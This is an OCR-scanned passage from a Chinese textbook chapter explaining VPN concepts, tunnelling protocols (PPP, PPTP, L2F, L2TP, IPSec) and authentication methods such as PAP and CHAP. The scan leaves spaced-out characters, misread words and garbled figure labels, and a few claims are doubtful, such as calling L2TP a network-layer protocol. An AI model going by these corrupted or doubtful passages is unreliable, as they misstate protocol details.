那么 VPN 的 概念 是 什么 呢 ?《IP Sec: 新 一 代 因 特 网 安全 标准 》(IPSec: 
The New Security Standard for the Internet, Intranets, and Virtual Private 


Networks, 机 械 工业 出 版 社 出 版 ,2000) 一 书 中 概括 的 极 好 :“VPN 是 “虚拟 
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的 ”, 因 为 它 不 是 一 个 物理 的 .明显 存在 的 网 络 ,两 个 不 同 的 物理 网 络 之 间 的 连接 由 通道 来 建 
立 ; VPN 是 “专用 的 ”, 因 为 为 了 提供 机 密 性 ,通道 被 加 密 ; VPN 是 "网络 ” ,因为 它 是 联网 
的 ! 我 们 在 连接 两 个 不 同 的 网 络 ,并 有 效 地 建立 一 个 独立 的 、 虚 拟 的 实体 一 一 一 个 新 的 
网 络 。” 

通俗 地 讲 ,VPN 就 是 两 个 或 多 个 用 户 ,利用 公用 的 网 络 环 境 进 行 数据 传输 ,并 在 发 送 和 
接收 数据 时 ,利用 隧道 技术 和 安全 技术 ,使 得 在 公 网 中 传输 的 数据 即使 被 第 三 方 截获 也 很 难 
进行 解密 的 技术 。 


13.1.1 VPN 基本 连接 方式 


虚拟 专用 网 络 可 以 实现 不 同 网 络 间 组 件 和 资源 的 相互 连接 。 虚 拟 专用 网 络 能 够 利用 
Internet 或 其 他 公共 互联 网 络 的 基础 设施 为 用 户 创建 隧道 ,并 提供 与 专用 网 络 一 样 的 安全 
和 功能 保障 。VPN 虚拟 通道 与 实际 网 络 连接 的 对 比 示意 图 如 图 13. 1 所 示 。 


到 
一 


(a) 局 域 网 拓扑 图 


加 
= 


于 ES = 


(b) VPN 网 络 拓扑 图 


图 13.1 VPN 网 络 与 实际 网 络 的 示意 图 


虚拟 专用 网 络 允 许 远 程 通信 方 、 销 售 人 员 或 企业 分 支 机 构 使 用 Internet 等 公共 互联 网 
络 的 路 由 基础 设施 ,以 安全 的 方式 与 位 于 企业 局 域 网 端的 企业 服务 器 建立 连接 。 虚 拟 专用 
网 络 对 客户 端 是 透明 的 ,用 户 好 像 在 使 用 一 条 专用 线路 ,在 客户 端 和 企业 服务 器 之 间 建 立 点 
对 点 连接 ,并 通过 这 条 “专线 ”进行 数据 传输 。 

虚拟 专用 网 络 技 术 同 样 支持 企业 通过 Internet 等 公共 互联 网 络 ,与 分 支 机 构 或 其 他 企 
业 建 立 连接 ,并 进行 安全 的 通信 。 这 种 跨越 Internet 建立 的 VPN 连接 ,在 逻辑 上 等 同 于 两 
地 之 间 使 用 广域网 建立 的 连接 。 

虚拟 专用 网 络 支 持 以 安全 的 方式 通过 公共 互联 网 络 远程 访问 企业 资源 。VPN 虚 通 道 
示意 图 如 图 13. 2 所 示 。 

与 使 用 专线 拨打 长 途 或 (800) 电 话 连 接 企业 的 网 络 接 入 服务 器 (NAS) 不 同 ,虚拟 专用 
网 络 用 户 首先 拨 通 本 地 ISP 的 NAS, 然 后 VPN 软件 利用 与 本 地 ISP 建立 的 连接 ,在 拨号 用 
户 和 企业 VPN 服务 器 之 间 创 建 一 个 跨越 Internet 或 其 他 公共 互联 网 络 的 虚拟 专用 网 络 。 

通过 Internet 实现 网 络 互 联 , 可 以 采用 以 下 两 种 方式 实现 VPN 连接 远程 局 域 网 络 。 

分 支 机 构 和 企业 局 域 网 使 用 专线 连接 到 本 地 ISP。 不 需要 使 用 价格 昂贵 的 长 距离 专用 
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网 络 运营 疝 总 部 网 络 


图 13.2 VPN 虚 通道 示意 图 


线路 ,分支 机 构 和 企业 端 路 由 器 可 以 使 用 各 自 本 地 的 专用 线路 ,通过 本 地 的 ISP 连通 
Internet。VPN 软件 使 用 本 地 ISP 和 Internet 建立 的 连接 ,在 分 支 机 构 和 企业 端 路 由 器 之 
间 创 建 一 个 虚拟 专用 网 络 。 

分 支 机 构 和 企业 局 域 网 使 用 拨号 线路 连接 到 本 地 ISP。 不 同 于 传统 的 使 用 连接 分 支 机 
构 端的 路 由 器 的 专线 ,拨打 长 途 或 (800) 电 话 连接 企业 网 络 接 入 服务 器 的 方式 ,分 支 机 构 端 
的 路 由 器 可 以 通过 拨号 方式 连接 本 地 ISP。VPN 软件 使 用 与 本 地 ISP 建立 起 的 连接 ,在 分 
支 机 构 和 企业 端 路 由 器 之 间 ,创建 一 个 跨越 Internet 的 虚拟 专用 网 络 。VPN 拨号 线路 连接 
示意 图 如 图 13. 3 所 示 。 


分 支 网 络 
图 13.3 VPN 拨号 线路 连接 示意 图 


以 上 两 种 方式 中 ,都 是 通过 使 用 本 地 设备 在 分 支 机 构 、 企 业 部 门 与 Internet 之 间 建 立 连 
接 。 因 此 ,VPN 可 以 大 大 节省 连接 的 费用 。 


13.12 VPN 的 基本 要 求 


一 般 来 说 ,企业 在 选用 一 种 远程 网 络 互联 方案 时 ,都 希望 能 够 对 访问 企业 资源 和 信息 的 

请 求 加 以 区 分 和 控制 ,所 选用 的 方案 应 当 既 能 够 实现 授权 用 户 与 企业 局 域 网 资源 的 自由 连 

接 ,又 能 够 确保 企业 数据 在 公共 互联 网 络 或 企业 内 部 网 络 上 传输 时 安全 性 不 受到 破坏 。 因 
此 ,一 个 成 功 的 VPN 方案 至 少 需要 满足 以 下 几 个 方面 的 要 求 。 

。 用 户 验证 : VPN 方案 必须 能 够 验证 用 户 身份 ,并 且 只 有 授权 用 户 才能 访问 VPN , 另 

外 ,VPN 方案 还 必须 提供 审计 和 计 费 功能 ,以 及 日 志 功 能 ,显示 何人 在 何 时 访问 了 


何 种 信息 。 
”地 址 管理 : VPN 方案 必须 能 够 为 用 户 分 配 专用 网 络 上 的 地 址 ,并 确保 地 址 的 安 
全 性 。 


"* 数据 加 密 : 对 通过 公共 互联 网 络 传递 的 数据 必须 进行 加 密 , 以 确保 网 络 中 未 授权 的 
用 户 无 法 读 取 其 中 的 信息 。 
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。 密 钥 管 理 : VPN 方案 必须 能 够 生成 并 更 新 客户 端 和 服务 器 的 加 密 密 钥 。 
。 多 协议 支持 : VPN 方案 必须 支持 公共 互联 网 络 上 普遍 使 用 的 基本 协议 ,包括 IP、 
IPX 等 。 


13.2 实现 VPN 的 隧道 技术 


隧道 技术 是 一 种 通过 使 用 互联 网 络 的 基础 设施 ,在 网 络 之 间 传 递 数据 的 技术 。 使 用 隧 
道 技术 传递 的 数据 (或 负载 ) 可 以 是 不 同 协议 的 数据 帧 或 包 。 隧 道 协议 将 这 些 协议 的 数据 帧 
或 包 重 新 封装 在 新 的 包头 中 发 送 。 新 的 包头 提供 了 路 由 信息 ,从 而 使 封装 的 数据 包 能 够 通 
过 互联 网 络 传递 。 

被 封装 的 数据 包 在 隧道 的 两 个 端点 之 间 ,通过 公共 互联 网 络 进行 路 由 选择 。 被 封装 的 
数据 包 在 公共 互联 网 络 上 传递 时 所 经 过 的 逻辑 路 径 称 为 障 道 。 一 旦 到 达 网 络 终点 ,数据 包 
将 被 解 包 并 转发 到 最 终 目的 地 。 注 意 ,隧道 技术 是 包括 数据 封装 .传输 和 解 包 在 内 的 全 过 
程 。VPN 隧道 技术 示意 图 如 图 13.4 所 示 。 


VPN 通 信 过 程 


原始 数据 包 还 原 的 数据 包 


加 密 过 程 
图 13.4 VPN 隧道 技术 示意 图 


隧道 技术 所 使 用 的 传输 网 络 可 以 是 任何 类 型 的 公共 互联 网 络 , 本 节 主 要 以 目前 普遍 使 
用 的 Internet 为 例 进 行 说 明 。 


1321 隧道 技术 列举 


隧道 技术 在 经 过 一 段 时 间 的 发 展 和 完善 之 后 ,目前 较为 成 熟 的 技术 包括 以 下 几 个 。 

@OD IP 网 络 上 的 SNA 隧道 技术 : 当 系统 网 络 结构 (System Network Architecture， 
SNA) 的 数据 流通 过 企业 IP 网 络 传送 时 ,SNA 数据 帧 将 被 封装 在 UDP( 用 户 数据 报 协议 ) 
和 IP( 网 际 协议 ) 包 头 中 。 

@ IP 网 络 上 的 Novell NetWare IPX 隧道 技术 : 当 IPX( 网 际 信息 包 交 换 协 议 ) 数 据 包 
被 发 送 到 NetWare 服务 器 或 IPX 路 由 器 时 ,NetWare 服务 器 或 IPX 路 由 器 用 UDP 和 IP 
包头 封装 IPX 数据 包 , 并 通过 IP 网 络 发 送 。 另 一 端的 IP-TO-IPX 路 由 器 在 去 除 UDP 和 卫 
包头 后 ,把 数据 包 转 发 到 IPX 目的 地 。 

而 目前 使 用 比较 广泛 的 隧道 技术 如 下 几 种 。 


第 13 章 虚拟 专用 网 络 技 | 


@ 点 对 点 隧道 协议 (PPTP): PPTP 协议 允许 对 IP、IPX 或 NetBEUI( 网 络 基 本 输入 输 
出 系统 增强 型 用 户 接口 ) 数 据 流 进行 加 密 , 然 后 封装 在 IP 包头 中 ,通过 企业 IP 网 络 或 公共 
互联 网 络 进行 传输 。 

@ 第 二 层 隧道 协议 (L2TP): L2TP 协议 允许 对 IP、IPX 或 NetBEUI 数 据 流 进行 加 密 ， 
然后 通过 支持 点 对 点 数据 报 传递 的 任意 网 络 进行 传输 ,如 IP、X. 25、 帧 中 继 或 ATM( 蜡 步 传 
输 模式 ) 。 

@ 安全 IP(IPSec) 隧 道 模式 : IPSec 隧道 模式 允许 对 IP 负载 数据 进行 加 密 , 然 后 封装 
在 IP 包头 中 ,通过 企业 IP 网 络 或 公共 IP 互联 网 络 进行 传输 。 


13.22 隧道 技术 的 实现 方式 


为 创建 隧道 ,隧道 的 客户 端 和 服务 器 端 双方 必须 使 用 相同 的 隧道 协议 。 

隧道 技术 分 以 第 二 层 或 第 三 层 隧 道 协议 为 基础 ,该 分 层 按 照 开 放 系 统 互 联 (OSI) 的 参 
考 模型 划分 。 第 二 层 隧 道 协议 对 应 OSI 模型 中 的 数据 链 路 层 ,使 用 帧 作为 数据 交换 单位 。 
PPTP、L2TP 和 L2F( 第 二 层 转 发 ) 都 属于 第 二 层 隧 道 协 议 ,都 是 将 数据 封装 在 点 对 点 协议 
(PPP) 帧 中 ,通过 互联 网 络 发 送 。 第 三 层 隧道 协议 对 应 OSI 模型 中 的 网 络 层 , 使 用 包 作为 数 
据 交换 单位 。IPoverIP 以 及 IPSec 隧道 模式 都 属于 第 三 层 隧 道 协议 ,都 是 将 IP 包 封 装 在 附 
加 的 IP 包头 中 ,通过 IP 网 络 传送 。 

对 于 像 PPTP 和 L2TP 这 样 的 第 二 层 隧 道 协议 ,创建 隧道 的 过 程 类 似 于 在 双方 之 间 建 
立会 话 。 隧 道 的 两 个 端点 必须 同意 创建 隧道 ,并 协商 配置 隧道 的 各 种 变量 ,如 地 址 分 配 、 加 
密 和 压缩 等 参数 。 大 多 数 情况 下 ,通过 隧道 传输 的 数据 都 使 用 基于 数据 报 的 协议 发 送 。 隧 
道 维护 协议 被 用 来 作为 管理 隧道 的 机 制 。 

第 三 层 隧道 技术 ,通常 假定 所 有 配置 已 经 通过 手工 完成 。 这 些 协 议 不 对 隧道 进行 维护 。 
与 第 三 层 隧 道 协议 不 同 ,第 二 层 隧道 协议 (PPTP 和 L2TP) 必 须 包 括 对 隧道 的 创建 .维护 和 
终止 全 过 程 。 

隧道 一 旦 建立 ,数据 就 可 以 通过 隧道 发 送 。 隧 道 的 客户 端 和 服务 器 端 使 用 隧道 数据 传 
输 协 议 传输 数据 。 例 如 , 当 隧道 客户 端 向 服务 器 端 发 送 数据 时 ,客户 端 首先 给 负载 数据 加 上 
一 个 隧道 数据 传送 协议 包头 ,然后 把 封装 的 数据 通过 互联 网 络 发 送 , 并 由 互联 网 络 将 数据 路 
由 到 隧道 的 服务 器 端 ,隧道 服务 器 端 在 收 到 数据 包 后 ,去 除 隧道 数据 传输 协议 包头 ,然后 将 
负载 数据 转发 到 目标 网 络 中 。 


1323 隧道 协议 和 基本 隧道 要 求 

第 二 层 隧道 协议 (PPTP 和 L2TP) 以 完善 的 PPP 协议 为 基础 ,继承 了 PPP 协议 的 整套 
特性 。 下 面 对 这 些 协议 及 其 基本 要 求 进行 简单 介绍 。 

1. 用 户 验 证 


第 二 层 隧道 协议 继承 了 PPP 协议 的 用 户 验证 方式 。 第 三 层 隧道 协议 假定 在 创建 隧道 
之 前 ,隧道 的 两 个 端点 之 间 相 互 已 经 了 解 或 已 经 通过 验证 。 特 殊 情 况 是 IPSec 协议 的 
ISAKMP 协商 提供 了 隧道 端点 之 间 进 行 的 相互 验证 。 
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2. 令 牌 卡 (tokencard) 支 持 


通过 使 用 扩展 验证 协议 (EAP) ,第 二 层 隧 道 协议 能 够 支持 多 种 验证 方法 ,包括 一 次 性 
口令 (one-time password) ,加 密 计 算 器 (cryptographic calculator) 和 智能 卡 等 。 第 三 层 隧 道 
协议 也 支持 使 用 类 似 的 方法 ,例如 IPSec 协议 通过 ISAKMP/Oakley 协商 确定 公共 密 钥 证 
书 验 证 。 

3. 动态 地 址 分 配 


第 二 层 隧 道 协议 支持 在 网 络 控制 协议 (NCP) 协 商机 制 的 基础 上 ,动态 分 配 用 户 地 址 。 
第 三 层 隧道 协议 通常 假定 隧道 建立 之 前 ,已 经 进行 了 地 址 分 配 。 目 前 ,IPSec 隧道 模式 下 的 
地 址 分 配方 案 仍 在 开发 中 。 


4. 数据 压缩 


第 二 层 隧 道 协议 支持 基于 PPP 的 数据 压缩 方式 。 例 如 Microsoft 的 PPTP 和 L2TP 方 
案 使 用 Microsoft 点 对 点 加 密 协 议 (MPPE)。IETP 正在 开发 应 用 于 第 三 层 隧道 协议 的 类 似 
数据 压缩 机 制 。 


5. 数据 加 密 


第 二 层 隧道 协议 支持 基于 PPP 的 数据 加 密 机 制 。Microsoft 的 PPTP 方案 支持 在 
RSA/RC4 算法 的 基础 上 选择 使 用 MPPE。 第 三 层 隧 道 协议 也 可 以 使 用 类 似 的 方法 ,例如 
IPSec 通过 ISAKMP/Oakley 协商 确定 几 种 可 选 的 数据 加 密 方法 。Microsoft 的 L2TP 协议 
使 用 IPSec 加 密 方式 ,保障 隧道 客户 端 和 服务 器 端 之 间 数 据 流 的 安全 。 


6. 密 钥 管理 


第 二 层 协 议 的 MPPE 依靠 验证 用 户 时 生成 的 密 钥 ,用 户 需 定期 对 密 钥 进行 更 新 。 
IPSec 在 ISAKMP 交换 过 程 中 ,公开 协商 公用 密 钥 ,同样 需要 用 户 对 其 进行 定期 更 新 。 


7. 多 协议 支持 


第 二 层 隧 道 协议 支持 多 种 负载 数据 协议 ,从 而 使 隧道 用 户 能 够 访问 IP、IPX 和 
NetBEUI 等 多 种 协议 企业 网 络 。 相 反 , 第 三 层 隧道 协议 ,例如 ,IPSec 隧道 模式 只 支持 使 用 
IP 协议 的 目标 网 络 。 


13.3 ”VPN 隧道 协议 及 技术 对 比 
VPN 技术 非常 复杂 ,下 面 主 要 介绍 VPN 隧道 协议 的 特性 ,并 进行 横向 对 比 。 


13.31 点 对 点 协议 


点 对 点 协议 (PPP) 可 以 对 IP、IPX、Apple Talk 和 NetBEUI 协议 的 数据 包 进 行 再 次 封 
装 ,并 把 新 的 数据 包 再 嵌入 IP 报 文 . 帧 中 继 或 ATM 中 进行 传输 。 
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因为 第 二 层 隧 道 协议 在 很 大 程度 上 依赖 PPP 协议 的 各 种 特性 ,所 以 有 必要 对 PPP 协 
议 进 行 深 入 探讨 。PPP 协议 主要 通过 拨号 或 专线 方式 ,建立 点 对 点 连接 发 送 数据 。PPP 协 
议 将 IP、IPX 和 NetBEUI 包 封装 在 PP 帧 中 ,通过 点 对 点 的 链 路 发 送 。PPP 协议 主要 应 用 
于 连接 拨号 用 户 和 NAS。PPP 拨号 会 话 过 程 可 以 分 成 5 个 不 同 的 阶段 。 


1. 创建 PPP 链 路 


PPP 使 用 链 路 控制 协议 (CLCP) 创 建 、 维 护 或 终止 一 次 物理 连接 。 应 当 注意 在 链 路 创建 
阶段 ,只 是 对 验证 协议 进行 选择 ,用 户 验证 将 在 第 2 阶段 实现 。 同 样 , 在 LCP 阶段 还 将 确定 
链 路 对 等 双方 是 否 要 对 数据 进行 压缩 或 加 密 。 对 数据 压缩 /加 密 算 法 和 其 他 细节 的 选择 将 
在 第 4 阶段 实现 。 


2. 用 户 验 证 


这 个 阶段 ,用户 会 将 PC 用 户 的 身份 发 给 远程 的 接 人 服务 器 。 该 阶段 使 用 一 种 安全 
验证 方式 ,避免 第 三 方 窃取 数据 或 冒充 远程 客户 端 接管 与 客户 端的 连接 。 大 多 数 PPP 方 
案 只 提供 有 限 的 验证 方式 ,包括 口令 验证 协议 (Password Authentication Protocol, PAP)、 
挑战 -握手 验证 协议 (Challenge Handshake Authentication Protocol,CHAP) 和 Microsoft 
挑战 -握手 验证 协议 (MS-CHAP)。 

(1) 口令 验证 协议 (PAP) 

PAP 是 一 种 简单 的 明文 验证 方式 。NAS 要 求 用 户 提 供用 户 名 和 口令 ,PAP 以 明文 形 
式 返 回 用 户 信息 。 很 明显 ,这 种 验证 方式 的 安全 性 较 差 , 第 三 方 可 以 很 容易 地 获取 被 传送 的 
用 户 名 和 口令 ,并 利用 这 些 信息 与 NAS 建立 连接 ,获取 NAS 提供 的 所 有 资源 。 因 此 ,一 旦 
用 户 密码 被 第 三 方 窃取 ,PAP 将 无 法 提供 更 多 的 保障 措施 。 

(2) 挑战 -握手 验证 协议 (CHAP) 

CHAP 是 一 种 加 密 的 验证 方式 ,能 够 避免 建立 连接 时 传送 用 户 的 真实 密码 。NAS 向 远 
程 客户 端 发 送 一 个 挑战 口令 (challenge) ,其 中 包括 会 话 ID 和 一 个 任意 生成 的 挑战 字 串 
(crbitrary challenge string)。 远 程 客户 端 必须 使 用 MD5 单 向 哈 希 算 法 (one-wayhashing 
algorithm) 返 回 用 户 名 、 加 密 的 挑战 口令 会话 ID 以 及 用 户口 令 , 其 中 用 户 名 以 非 哈 希 方式 
发 送 。CHAP 通信 方式 示意 图 如 图 13. 5 所 示 。 


客户 端 认证 服务 器 
加 发 起 挑战 口令 Ea 
己 是 ] 一 
做 出 响应 


发 起 挑战 口令 = 会 话 ID 号 ,挑战 字符 串 
响应 =MD5 哈 希 算法 (会 话 ID 号 ,挑战 字符 串 ,用 户 密码 ), 用 户 名 


图 13.5 CHAP 通信 方式 示意 图 


CHAP 对 PAP 进行 了 改进 ,不 再 直接 通过 链 路 发 送 明 文 口令 ,而 是 使 用 喻 希 算法 对 挑 
战 口令 进行 加 密 。 因 为 服务 器 端 存 有 用 户 的 明文 口令 ,所 以 服务 器 可 以 重复 客户 端 进行 的 
操作 ,并 将 结果 与 用 户 返 回 的 口令 进行 对 照 。CHAP 为 每 一 次 验证 任意 生成 一 个 挑战 字符 
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串 ,来 防止 受到 再 现 攻击 (replay attack) 。 在 整个 连接 过 程 中 ,CHAP 将 不 定时 的 向 客户 端 
重复 发 送 挑 战 口令 ,从 而 避免 第 三 方 冒充 远程 客户 (remoteclient impersonation ) 端 进行 
攻击 。 

(3) Microsoft 挑战 -握手 验证 协议 (MS-CHAP) 

与 CHAP 类似, MS-CHAP 也 是 一 种 加 密 验 证 机 制 。 使 用 MS-CHAP 时 ,NAS 会 向 
远程 客户 端 发 送 一 个 含有 会 话 ID 和 一 个 任意 生成 的 挑战 字符 串 的 挑战 口令 。 远 程 客户 
端 必须 返回 用 户 名 以 及 经 过 MD4 哈 希 算法 加 密 的 挑战 字符 串 、 会 话 ID 和 用 户口 令 的 
MD4 哈 希 值 。 采 用 这 种 方式 ,服务 器 端 将 只 存储 经 过 哈 希 算法 加 密 的 用 户口 令 而 不 存储 
明文 口令 ,这 样 就 能 够 提供 进一步 的 安全 保障 。 此 外 , MS-CHAP 还 支持 附加 的 错误 编 
码 , 包 括 口 令 过 期 编码 以 及 允许 用 户 自己 修改 口令 的 加 密 的 客户 端 -服务 器 (client-server) 
附加 信息 。 

在 使 用 MS-CHAP 时 ,客户 端 和 NAS 双方 各 自生 成 一 个 用 于 数据 加 密 的 起 始 密 钥 。 
MS-CHAP 使 用 基于 MPPE 的 数据 加 密 , 这 一 点 可 以 解释 为 什么 使 用 基于 MPPE 的 数据 加 
密 时 必须 进行 MS-CHAP 验证 。 

在 PPP 链 路 配置 阶段 ,NAS 收集 验证 数据 ,然后 对 照 自己 的 数据 库 或 中 央 验 证 数据 库 
服务 器 (位 于 NT 主 域 控制 器 或 远程 验证 用 户 拨 入 服务 器 ) ,验证 数据 的 有 效 性 。 


3. PPP 回 叫 控制 (call back control) 


Microsoft 设计 的 PPP 包括 一 个 可 选 的 回 叫 控制 阶段 。 该 阶段 在 完成 验证 之 后 使 用 回 
叫 控制 协议 (CBCP) 。 如 果 配 置 使 用 回 叫 ,那么 在 完成 验证 后 远程 客户 端 和 NAS 之 间 的 连 
接 将 会 被 断 开 。 然 后 ,由 NAS 使 用 特定 的 电话 号 码 回 叫 远 程 客户 端 ,这 样 做 ,可 以 进一步 
保证 拨号 网 络 的 安全 性 。 


4. 调用 网 络 层 协 议 


以 上 阶段 完成 后 , PPP 将 调用 在 链 路 创建 阶段 (阶段 1) 选 择 的 各 种 网 络 控制 协议 
(NCP)。 例 如 ,在 该 阶段 IP 控制 协议 (IPCP) 可 以 向 拨 入 用 户 分 配 动态 地 址 。 在 Microsoft 
的 PPP 方案 中 ,考虑 到 数据 压缩 和 数据 加 密 的 实现 过 程 相同 ,所 以 使 用 压缩 控制 协议 共同 
协商 数据 压缩 (使 用 MPPC) 和 数据 加 密 ( 使 用 MPPE) 。 


5. 数据 传输 阶段 


一 旦 完成 上 述 4 个 阶段 的 协商 ,PPP 就 开始 在 连接 的 对 等 双方 之 间 转 发 数据 。 每 个 被 
传送 的 数据 报 都 被 封装 在 PPP 包头 中 ,该 包头 将 会 在 到 达 接 收 方 后 被 去 除 。 如 果 在 阶段 1 
选择 使 用 数据 压缩 ,并且 在 阶段 4 完成 了 协商 ,数据 将 会 在 传送 时 进行 压缩 。 类 似 的 ,如 果 
选择 使 用 数据 加 密 并 完成 了 协商 ,数据 (或 被 压缩 数据 ) 将 会 在 传送 之 前 进行 加 密 。 


13.32 点 对 点 隧道 协议 


1996 年 , Microsoft 和 Ascend 公司 在 PPP 协议 的 基础 上 开发 出 了 点 对 点 隧道 协议 
(PPTP) , 它 被 集成 在 Windows NT Server 4. 0 系统 中 ,并 在 Windows NT Workstation 和 
Windows 9x 系统 中 提供 了 相应 的 客户 端 软 件 。 
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PPTP 协议 使 用 Microsoft 的 点 对 点 加 密 算法 (Microsoft Point-to-Point Encryption， 
MPPE) ,可 以 选用 40 位 和 128 位 两 种 密 钥 。PPTP 还 提供 了 流量 控制 机 制 ,从 而 避免 了 过 
多 通信 拥塞 情况 的 发 生 ,减少 了 数据 包 重 传 的 数量 ,减轻 了 网 络 传输 的 压力 。 

PPTP 是 第 二 层 的 协议 , 它 将 PPP 数据 帧 封装 在 IP 数据 报 中 ,并 通过 IP 网 络 ( 如 
Internet) 传 送 。PPTP 还 可 用 于 专用 局 域 网 络 之 间 的 连接 。PPTP 使 用 TCP 连接 对 隧道 进 
行 维 护 , 使 用 通用 路 由 封装 (Generic Routing Encapsulation,GRE) 技 术 把 数据 封装 成 PPP 
数据 帧 通过 隧道 传送 。 同 时 也 可 以 对 封装 在 PPP 帧 中 的 负载 数据 进行 加 密 或 压缩 。 


13.33 L2F 协 议 


1996 年 Cisco 公司 推出 了 L2F(Layer 2 Forwarding) 协 议 ,L2F 支持 拨号 接 和 人 服务 器 ， 
它 将 拨号 数据 流 封 装 在 PPP 帧 中 ,并 通过 广域网 链 路 传送 到 L2F 服务 器 (这 里 通常 是 指 
Cisco 公司 的 路 由 器 ) ,路 由 器 把 数据 包 解 包 后 再 利用 网 络 发 送出 去 。 因 此 可 以 看 出 ,L2F 
协议 没有 确定 的 客户 端 ,并 且 L2F 协议 只 在 强制 隧道 中 有 效 。( 自 愿 隧道 和 强制 隧道 的 介 
绍 参看 “隧道 类 型 ”) 。 


13.34 L2TP 协议 


1998 年 ,Microsoft 公司 和 Cisco 公司 结合 PPTP 协议 和 L2F(Layer 2 Forwarding) 协 
议 的 优点 ,推出 了 第 二 层 隧道 协议 L2TP。L2TP 协议 继承 了 PPTP 协议 的 封装 和 传输 机 
制 , 同 时 L2TP 协议 在 通信 的 两 端 采用 挑战 -握手 协议 CHAP 来 验证 对 方 的 身份 。 

L2TP 是 一 种 网 络 层 协议 ,支持 封装 的 PPP 帧 在 IP、X. 25、 帧 中 继 和 ATM 等 网 络 上 进 
行 传送 。 当 使 用 IP 作为 L2TP 的 数据 报 传输 协议 时 ,可 以 使 用 L2TP 作为 Internet 网 络 上 
的 隧道 协议 。L2TP 还 可 以 直接 在 各 种 WAN 媒介 上 使 用 而 不 需要 使 用 IP 传输 层 。 

L2TP 使 用 UDP 和 一 系列 的 L2TP 消息 对 隧道 进行 维护 。L2TP 同样 使 用 UDP ,将 
L2TP 协议 封装 的 PPP 帧 通过 隧道 进行 发 送 。 同 样 也 可 以 对 封装 在 PPP 帧 中 的 负载 数据 
进行 加 密 或 压缩 。 

PPTP 和 L2TP 将 不 安全 的 IP 包 封 装 在 安全 的 IP 包 内 ,它们 利用 IP 帧 在 两 台 计 算 机 
之 间 创 建 和 打开 数据 通道 ,一 旦 数据 通道 建立 起 来 , 则 源 和 目的 两 端的 用 户 就 不 再 需要 进行 
身份 认证 了 ,这 样 会 带 来 一 定 的 安全 隐患 。 同 时 ,第 二 层 协 议 的 工作 原理 不 包括 对 两 个 结 点 
之 间 的 信息 传输 进行 监控 或 控制 。PPTP 和 L2TP 最 多 只 能 同时 连接 255 个 用 户 。 结 点 用 
户 需 要 在 连接 前 手工 建立 加 密 信道 。 

PPTP 和 L2TP 协议 也 有 一 些 主要 的 区 别 如 表 13. 1 所 示 。 


表 13.1 PPTP 和 L2TP 协议 区 别 


PPTP L2TP 协议 
对 网 络 的 要 求 要 求 网 络 为 卫 网 络 只 要 求 隧道 提供 面向 数据 包 的 点 对 点 的 
连接 
隧道 数量 在 通信 两 端 只 能 建立 单一 的 隧道 在 通信 两 端 可 以 建立 多 条 隧道 
包头 压缩 不 支持 包头 压缩 ,包头 占用 6 个 字 节 ”支持 包头 压缩 ,包头 只 占 4 个 字 节 


隧道 验证 不 支持 隧道 验证 支持 隧道 验证 
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PPTP 和 L2TP 最 适合 用 于 远程 访问 虚拟 专用 网 。 

PPTP 和 L2TP 使 用 PPP 协议 对 数据 进行 封装 ,然后 添加 附加 包头 ,用 于 数据 在 互联 
网 络 上 的 传输 。 尽 管 两 个 协议 非常 相似 ,但 是 仍 存在 以 下 几 方 面 的 区 别 。 

Q@ PPTP 要 求 互联 网 络 为 IP 网络 。L2TP 只 要 求 隧道 媒介 提供 面向 数据 包 的 点 对 点 
的 连接 。L2TP 可 以 在 IP( 使 用 UDP) 、 帧 中 继 永久 虚拟 电路 (PVCs) 、X. 25 虚拟 电路 (VCs) 
或 ATM VCs 网 络 上 使 用 。 

@ PPTP 只 能 在 两 个 端点 间 建 立 单一 隧道 。L2TP 支持 在 两 端点 间 使 用 多 隧道 。 使 用 
L2TP 时 ,用 户 可 以 针对 不 同 的 服务 质量 创建 不 同 的 隧道 。 

@@ L2TP 可 以 提供 包头 压缩 。 当 压缩 包头 时 ,系统 开销 (Overhead) 占 用 4B, 而 PPTP 
协议 则 要 占用 6B。 

@ L2TP 可 以 提供 隧道 验证 ,而 PPTP 则 不 支持 隧道 验证 。 但 是 当 L2TP 或 PPTP 与 
IPSec 共同 使 用 时 ,可 以 由 IPSec 提供 隧道 验证 ,而 不 需要 在 第 二 层 协议 上 验证 隧道 。 


13.35 IPSec 隧道 技术 
1. IPSec 隧道 模式 


第 二 层 隧 道 协议 只 能 保障 在 隧道 两 端 进行 认证 和 加 密 ,而 不 能 在 数据 传输 过 程 中 进行 
更 多 的 安全 保护 。IPSec 是 第 三 层 的 VPN 协议 , 它 在 隧道 外 面 进行 再 封装 ,保证 了 数据 传 
输 中 的 安全 问题 。IPSec 技术 提供 的 安全 保护 措施 包括 : 数据 源 认证 、 无 连接 数据 的 完整 性 
验证 ,数据 内 容 的 机 密 性 保护 和 抗 重播 保护 等 。 

除了 对 IP 数据 流 的 加 密 机 制 进行 规定 外 ,IPSec 还 制定 了 IPoverIP 隧道 模式 的 数据 包 
格式 ,一般 被 称 作 IPSec 隧道 模式 。 一 个 IPSec 隧道 由 一 个 隧道 客户 端 和 隧道 服务 器 组 成 ， 
两 端 都 使 用 IPSec 隧道 技术 ,采用 协商 加 密 机 制 。 

为 实现 在 专用 或 公共 IP 网 络 上 的 安全 传输 ,IPSec 隧道 模式 使 用 安全 方式 封装 和 加 密 
整个 IP 包 。 然 后 将 加 密 的 负载 再 次 封装 在 明文 IP 包头 中 ,通过 网 络 发 送 到 隧道 服务 器 端 。 
隧道 服务 器 对 收 到 的 数据 报 进行 处 理 , 在 去 除 明 文 IP 包头 ,对 内 容 进行 解密 后 ,获得 最 初 的 
负载 IP 包 。 负 载 IP 包 在 经 过 正常 处 理 后 被 传输 到 目标 网 络 中 。 

IPSec 隧道 模式 具有 如 下 特点 。 

。 只 支持 IP 数据 流 。 

。 工作 在 IP 栈 (IPstack) 的 底层 ,应 用 程序 和 高 层 协议 可 以 继承 IPSec 的 行为 。 


2. 隧道 类 型 


(1) 自愿 隧道 

自愿 隧道 (Voluntary Tunnel) 是 目前 普遍 使 用 的 隧道 类 型 。 用 户 或 客户 端 计算 机 可 以 
通过 发 送 VPN 请 求 配置 和 创建 一 条 自愿 隧道 。 此 时 ,客户 端 计算 机 作为 隧道 客户 端 成 为 
隧道 的 一 个 端点 。 

一 个 工作 站 或 路 由 器 使 用 隧道 客户 软件 .创建 到 目标 隧道 服务 器 的 虚拟 连接 时 ,建立 自 
愿 隧道 。 为 实现 这 一 目的 ,客户 端 计算 机 必须 选择 适当 的 隧道 协议 。 自 愿 隧道 需要 有 一 条 
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IP 连接 (通过 局 域 网 或 拨号 线路 )。 使 用 拨号 方式 时 ,客户 端 必 须 在 建立 隧道 之 前 ,创建 与 
